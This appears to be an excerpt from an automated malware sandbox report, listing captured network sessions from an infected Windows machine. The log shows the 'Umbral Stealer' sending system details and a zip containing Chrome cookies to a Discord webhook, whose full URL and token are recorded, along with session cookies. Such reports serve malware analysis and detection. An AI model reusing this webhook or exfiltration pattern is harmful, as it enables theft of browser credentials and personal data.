                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZdiflgOgxFUoHHgHUQbH5MtmIDd7r0%2FpFKawHWVSp4oB9A9fPX0%2FQlUwC3MJhxqHdRYz9sd%2FqvT0IHIm1Tll7Xq5ZqNJmimTScepUvxmpW%2Bq155uG5KFY2ovnY9notV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25952bf8d435c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:16 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      35192.168.2.549770104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:16 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:17 UTC745INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 27404
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VT4GSC4KK8FNFRDGCWCFT
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1LndiuMAfg28CNUhb78%2FLVoNVrztt86poIq9qbf%2BwQgSNHuA8oetBx7tiwR%2B6jLGQW2i%2BLBO2P4RG%2B4YBP5N9OAza%2BtFJx1A2OhK9uY3tXOlfmJ9O6%2B5GC0NBO%2B"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259568a4878e7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:17 UTC624INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:17 UTC1369INData Raw: 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20
                                      Data Ascii: padding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center;
                                      2024-09-06 23:48:17 UTC1096INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.242085
                                      2024-09-06 23:48:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      36192.168.2.549771162.159.135.232443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:19 UTC360OUTPOST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 941
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:19 UTC25INHTTP/1.1 100 Continue
                                      2024-09-06 23:48:19 UTC941OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 39 32 37 35 33 37 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                      Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                      2024-09-06 23:48:19 UTC1369INHTTP/1.1 204 No Content
                                      Date: Fri, 06 Sep 2024 23:48:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      set-cookie: __dcfduid=7e94daf06caa11efabb97ad25800c058; Expires=Wed, 05-Sep-2029 23:48:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666500
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuJ0zFKGDU6yIDE6es9Cu3v6Jrkfnnc9GyWuoaj%2FrWVmRroxh%2FQJR2Z2E1jiP6kjYP97f%2BLjgocZq1PxxYB3b7E4P9VKAqCKgeSSRDHwqQt7iLDLJ4D3509B7hbH"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=7e94daf06caa11efabb97ad25800c058b9c0b9de442cc4ef84a2bd6075eea9287b7684b074dc12047e96f5f10bd1a1ff; Expires=Wed, 05-Sep-2029 23:48:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=84b80910d66750df07d9d462aac5548a7cfc284a-1725666499; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie: _cf
                                      2024-09-06 23:48:19 UTC196INData Raw: 75 76 69 64 3d 41 78 46 70 73 4e 56 51 7a 61 6a 43 45 36 68 4b 4a 78 61 42 34 77 58 73 57 68 73 31 30 67 68 4f 38 54 36 49 59 74 32 48 70 75 38 2d 31 37 32 35 36 36 36 34 39 39 35 38 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 66 32 35 39 36 34 65 63 65 65 34 33 35 63 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: uvid=AxFpsNVQzajCE6hKJxaB4wXsWhs10ghO8T6IYt2Hpu8-1725666499583-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8bf25964ecee435c-EWR


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      37192.168.2.549772162.159.135.232443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:20 UTC684OUTPOST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="2410dd78-6e8d-4692-be60-eb2fd347f134"
                                      Host: discord.com
                                      Cookie: __dcfduid=7e94daf06caa11efabb97ad25800c058; __sdcfduid=7e94daf06caa11efabb97ad25800c058b9c0b9de442cc4ef84a2bd6075eea9287b7684b074dc12047e96f5f10bd1a1ff; __cfruid=84b80910d66750df07d9d462aac5548a7cfc284a-1725666499; _cfuvid=AxFpsNVQzajCE6hKJxaB4wXsWhs10ghO8T6IYt2Hpu8-1725666499583-0.0.1.1-604800000
                                      Content-Length: 373782
                                      Expect: 100-continue
                                      2024-09-06 23:48:20 UTC25INHTTP/1.1 100 Continue
                                      2024-09-06 23:48:20 UTC40OUTData Raw: 2d 2d 32 34 31 30 64 64 37 38 2d 36 65 38 64 2d 34 36 39 32 2d 62 65 36 30 2d 65 62 32 66 64 33 34 37 66 31 33 34 0d 0a
                                      Data Ascii: --2410dd78-6e8d-4692-be60-eb2fd347f134
                                      2024-09-06 23:48:20 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 0d 0a 0d 0a
                                      Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 07 9e 26 59 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                      Data Ascii: PK&Y*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: 20 4c 9f 22 d6 77 ac 08 5c 21 33 f7 87 94 72 c9 e3 4d d2 c2 98 a4 a9 a2 96 e0 45 06 c9 5c 54 fb 45 25 05 2e ba a4 08 23 64 ce a4 9b 4f 37 64 bc dc b6 75 7e c4 1b 74 f3 03 b7 b3 74 b4 62 29 a3 58 c0 84 7a fc bd 7c bc 61 36 70 21 9a 90 11 56 2c f0 21 31 44 25 62 43 0e 5f 07 e2 95 6d 97 89 b8 63 44 9c f5 40 da 56 11 5e e7 11 9d 2f 2a 87 56 c7 4f 63 dc e4 fd cb 45 b7 44 6f e9 84 5e a1 1f 31 5e 8e 7e 93 2f a7 2b 60 64 ae df 76 51 e8 6a bd c9 5b 19 ec 5e dc 69 ed 54 fd ba da 34 0e 3a a9 6d 6e a1 96 96 29 a4 4d bf 86 2f 33 c1 6b 48 c4 27 e5 11 71 3f 44 7f 2a 93 3f ad 79 aa e4 34 ae d0 dd 92 92 c8 c7 f4 14 51 27 ae bf fb aa 71 c0 69 ee 34 11 33 36 4c 1c a0 49 e2 86 54 37 db cf 00 8e 88 dd 83 40 dd e9 35 71 67 d6 a3 b3 e7 3d ab b2 ab 5a ce 1e 68 6b 99 ad 7f 19 6a
                                      Data Ascii: L"w\!3rME\TE%.#dO7du~ttb)Xz|a6p!V,!1D%bC_mcD@V^/*VOcEDo^1^~/+`dvQj[^iT4:mn)M/3kH'q?D*?y4Q'qi436LIT7@5qg=Zhkj
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: 12 ed e1 ad 72 c7 6d c2 55 b2 9c 0c c6 44 52 f9 46 af 1c 87 de 50 b6 c5 a9 48 53 1b 6e 0c c8 e6 12 1c 81 c8 80 f8 30 d1 04 e9 6d d0 5e ec c8 2b 79 26 5a b6 cb 7c 90 b5 2a b0 2c 9b 85 63 75 c8 ff 50 d6 54 f8 e3 df f6 b4 04 79 6d b1 2d b1 b3 c1 d7 c0 f4 33 f6 a5 52 df 52 5e 75 69 75 ab 53 24 4c a3 9a ec 2f f1 19 9e 1e fc c5 28 e5 1b e0 1d d0 0a 68 4b f8 5e 6d a7 26 99 91 e3 7f e8 ac c5 b2 e6 2c 09 b2 73 42 c1 ab 9a 66 47 a6 45 ec 24 3f 3a b0 a1 75 ac 17 77 81 49 6e cc 68 ed df 4a 08 d9 aa 28 b4 80 a1 56 6d b8 e8 0f 1d 95 a4 f4 fd 1c 83 fd 01 15 02 71 59 c0 82 cd f6 61 23 ac 2e 3d 35 9e c8 ff eb 40 f5 66 13 fc 9c fc 52 27 24 29 78 60 ba ad 53 5a ea db 4c 6a d5 e6 ca e8 8f c9 a9 77 d2 62 77 4d c2 4f a3 3d da d3 f2 ea 77 6b 50 bb 88 23 df 1a 20 8d 0a 09 06 27
                                      Data Ascii: rmUDRFPHSn0m^+y&Z|*,cuPTym-3RR^uiuS$L/(hK^m&,sBfGE$?:uwInhJ(VmqYa#.=5@fR'$)x`SZLjwbwMO=wkP# '
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: 07 fa 1e 0f 2e bf f2 8b af ec 79 40 c5 a3 88 9d ba 66 7d 1c 00 51 2d 47 00 ea 4f 8b f6 ea a2 d5 3f 61 9b f9 54 0f 7d 16 c8 51 00 ea 5d d1 73 94 03 f4 f8 a3 7e 40 ef 7a b1 b5 ff 86 92 33 71 90 d0 c4 36 65 e4 39 4b b8 ef de 9c 0e 4d be fe ef 2b fe 3a 4f 80 55 a0 09 e0 36 45 a6 fb 3c 37 e1 14 ee e1 00 e8 2b 20 84 3b da 5a 9e 8d b1 40 1b c7 cb 2f 14 1d e0 3c 9d a5 2b 3f 0c dd 14 42 89 f2 6b 8f 69 ba a1 6c 75 8c 2f 15 ad 8d 91 59 53 5d 3c 87 2e 36 34 14 f1 89 49 bb 14 c9 ee ce f4 f5 d2 78 25 a3 ae 5c c3 c9 5d ba de f5 20 24 e5 cb cf 0d da a1 85 83 a5 6d 87 5d 79 61 69 70 95 4a 32 cf 2b 29 9e 23 7c 7c de 82 85 21 c4 db a2 8a f5 93 3c d5 1b 14 b9 5c 80 52 df d1 a1 b8 04 42 9e 20 bf cf c4 14 77 3a de 1a f1 c2 ad fd 71 2e 14 49 3e f3 15 b0 43 c9 e8 03 e1 86 fd 16
                                      Data Ascii: .y@f}Q-GO?aT}Q]s~@z3q6e9KM+:OU6E<7+ ;Z@/<+?Bkilu/YS]<.64Ix%\] $m]yaipJ2+)#||!<\RB w:q.I>C
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: de e2 40 30 ba 1f 88 1e 10 eb 0c 10 70 45 2b 47 1c 35 ef 31 2d 0a 3f 06 44 a1 50 ac b1 5f 8f 9f a5 93 73 72 cd 84 3a 9d e0 3b 99 03 82 79 19 5a e3 f2 ff 39 91 e7 4e d9 30 68 db a5 70 fc ba c2 9a e4 cb 4d ea 9f 73 c9 06 b0 e0 f7 d3 a3 24 78 fa 67 80 c5 34 24 44 34 09 c6 57 3d 6a f3 1f de dc 00 4f a2 a5 e4 36 12 06 70 1c 8e 8b 07 cb 01 3c 76 b5 db 38 21 5e b0 86 c5 b4 3d f5 1a 0e 73 1d d3 63 4d 19 01 ae 08 21 3a eb 0f 80 ec 21 cb b8 6b 67 e6 e4 45 aa fc 56 af 66 a4 95 30 c1 4a c4 bb 7b 0a 89 e5 13 da 56 97 fa 98 ff 63 98 cd b6 35 a5 7c 6c d1 ae b8 93 69 26 15 60 89 d2 b9 3f 89 56 b3 0b dc d0 1f dd d9 73 05 15 85 75 ef 75 0b 46 ae ea e6 73 37 30 d7 79 1d e1 14 73 cf 6a ba 09 fe 36 eb b7 5f 4d e1 bf a5 50 44 60 da 51 11 78 ed 2a f1 6f c4 aa c4 30 db 74 e9 8f
                                      Data Ascii: @0pE+G51-?DP_sr:;yZ9N0hpMs$xg4$D4W=jO6p<v8!^=scM!:!kgEVf0J{Vc5|li&`?VsuuFs70ysj6_MPD`Qx*o0t
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: 26 5e 5c ee 17 db e5 ea f4 91 55 f8 0a 7f 29 ce 1d 79 4c a9 42 2d 9d ba 6f a9 8b de c1 70 51 d5 23 43 64 85 e1 ac 07 be af 76 e9 34 6d be a0 b3 10 16 cb c6 8b 3f 55 1d 38 df 3a b4 2e 21 cc 76 1a d6 62 9b 20 7e c1 e6 22 23 04 0b ae 48 43 08 2e 8c 07 85 ec 50 ab 17 5b ad 2c 7d 60 88 e8 59 d4 2c 5f fa e5 d0 2b fd 76 3e f3 40 6a 32 84 75 73 c1 cf 30 c9 9f d7 f7 1f 2a 77 94 1b ae 51 cd 79 63 90 54 73 04 cf 34 02 4f c5 7d 49 fb 84 a4 fd 1e 9c 64 fc b3 3f 5f 4f 25 69 dc 37 27 63 5d b3 dd 2f 9d 18 08 ba 7c a2 f1 3b af 5f 7c d5 2e 20 dc 82 24 a7 2f 06 08 ea 4e 50 c5 6c 82 b1 e7 94 b8 a8 b2 b0 ec 6a 7a e8 2c a7 32 50 8c b3 cb 38 a0 8d 16 ce 67 8c 4f fc bc b2 8a 83 0f 8e 2c de fa 3f c9 57 ba 2a 5b 1d 96 8d c2 af fe 9b 80 65 e5 30 12 9a 58 d8 94 e3 3e ad 9c e3 7e e9
                                      Data Ascii: &^\U)yLB-opQ#Cdv4m?U8:.!vb ~"#HC.P[,}`Y,_+v>@j2us0*wQycTs4O}Id?_O%i7'c]/|;_|. $/NPljz,2P8gO,?W*[e0X>~
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: c0 b1 63 44 04 ed 02 d4 9c 52 7a ea aa 5c aa 77 b9 d7 77 db 35 ed a4 54 7b b2 d6 9b 87 ae 4f f0 e0 de 96 dd ab ba 0a d9 f1 fa cf 22 bc 33 54 e8 d0 ca 58 8b 02 bd 29 37 fa 05 d9 11 ff 8b 23 37 e8 35 36 d1 07 3f ac de 00 6a cf f5 19 d1 df 50 87 7d ff 74 16 42 ef d6 95 7f af 7f b4 ef 29 b2 9b 3a f3 da f9 85 b1 89 f5 2d a5 65 25 c0 e8 d7 3f 9c 77 eb 2e 40 ae 48 2f 31 35 9f e0 61 96 73 11 9a 5e a7 7f 9a 7a 22 e5 17 ec 9d e7 af e8 3e 0b 7a e9 f7 65 f9 c5 ba a7 88 56 db d1 f6 28 d2 2d f1 d2 8e 33 a3 5a 8a cf d4 d0 8f 37 92 4b 90 ad 65 f4 33 37 30 a2 5e 2f d1 c7 e8 c7 63 92 cd 93 bd 90 ca dd 6b cf dd dd a4 bb be 0e 58 b7 de 4e 21 50 77 d8 7e a4 33 5e 68 8a 61 b3 0c d8 9c a2 68 f3 12 1b 62 d8 a8 e3 f9 c4 c9 eb 20 a5 66 22 0b 71 ef 0a b2 f3 09 84 83 df 66 62 42 f5
                                      Data Ascii: cDRz\ww5T{O"3TX)7#756?jP}tB):-e%?w.@H/15as^z">zeV(-3Z7Ke370^/ckXN!Pw~3^hahb f"qfbB
                                      2024-09-06 23:48:20 UTC16355OUTData Raw: 4e 10 a4 cb e6 ed 24 6e 97 b6 25 15 27 3c b1 dd 76 ef 08 db 33 fc 6c 3e b6 d8 2a 40 b2 ec aa 31 bb b0 c9 3f b9 b3 10 28 05 7b 35 c1 63 f1 a1 15 1e cd 4e 17 b1 5f 60 49 a1 d3 79 c3 9b 36 7d d8 c5 40 0b 5f 1d a1 d9 b6 09 7e 7f 52 67 33 2a b4 af 3f 23 88 52 51 34 3d ce e4 f7 32 30 72 90 30 50 f7 fd 75 92 e5 b0 fe 9d 41 e5 fa fc 82 e8 ae f7 0b c5 eb 09 88 20 aa f2 7e ff 69 ac 02 df a9 57 d0 e7 f4 17 0c 68 0c dd ed c8 93 ff fb 3e 55 8c 11 ac 21 fa 6a 05 58 8f 7e 98 20 5d c7 e9 57 6d 46 4e e8 85 4a 43 ef 0e 9a 0e 9f 5f 4c dd c6 a2 55 7f 96 9e 62 01 35 f5 14 8e 94 d6 6a 3f 5e 8b 31 81 74 f6 84 c8 ac ba da 68 84 5c 26 4b 74 75 a4 6b 89 31 c0 68 15 17 01 de 0c 78 7f 93 42 d8 db 68 75 80 cd ea 56 13 92 c9 60 35 17 8e 23 fb 95 a0 75 c8 05 4b 50 7f 95 e8 19 7f 93 41
                                      Data Ascii: N$n%'<v3l>*@1?({5cN_`Iy6}@_~Rg3*?#RQ4=20r0PuA ~iWh>U!jX~ ]WmFNJC_LUb5j?^1th\&Ktuk1hxBhuV`5#uKPA
                                      2024-09-06 23:48:21 UTC1369INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:20 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666502
                                      x-ratelimit-reset-after: 1
                                      vary: Accept-Encoding
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjuItcBQy%2BOYoNybsv7Icqitouv%2Bdl%2B42YzyifhOaKuRQ4%2B9tFqibO6gLPU6%2F%2FApQLGonJBznKWENJV32OS412r4eWLSc8iTHgs17TdX2ojyS9fzR7wIO%2BIOP3ka"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Server: cloudflare
                                      CF-RAY: 8bf2596a0e1e1815-EWR
                                      40b
                                      {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1281762948012052612","filename":"Umbral-927537.zip","size":373558,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762948012052612/Umbral-927537.zip?ex=66dce644&is=66db94c4&hm=dd7d40848de92f6aed351dced1005163d4fb559e959eaf97c149be06ca2d422d&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/12817629


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      38192.168.2.549773188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:20 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:20 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:20 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:20 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5bLm9b8BvthVbRTVKdbgen3D7zYTxD6WwRJg3jOyE3y0CK9LFkMC8K6KHyonnKvTJrW7Ncj13cm%2BT6jYf%2FrF8l3ygPS2Iidw%2F6y7COfqpFI%2FLXg98NsXA5KN9puI9qp"}],"group":"cf-nel","max_age":604800}
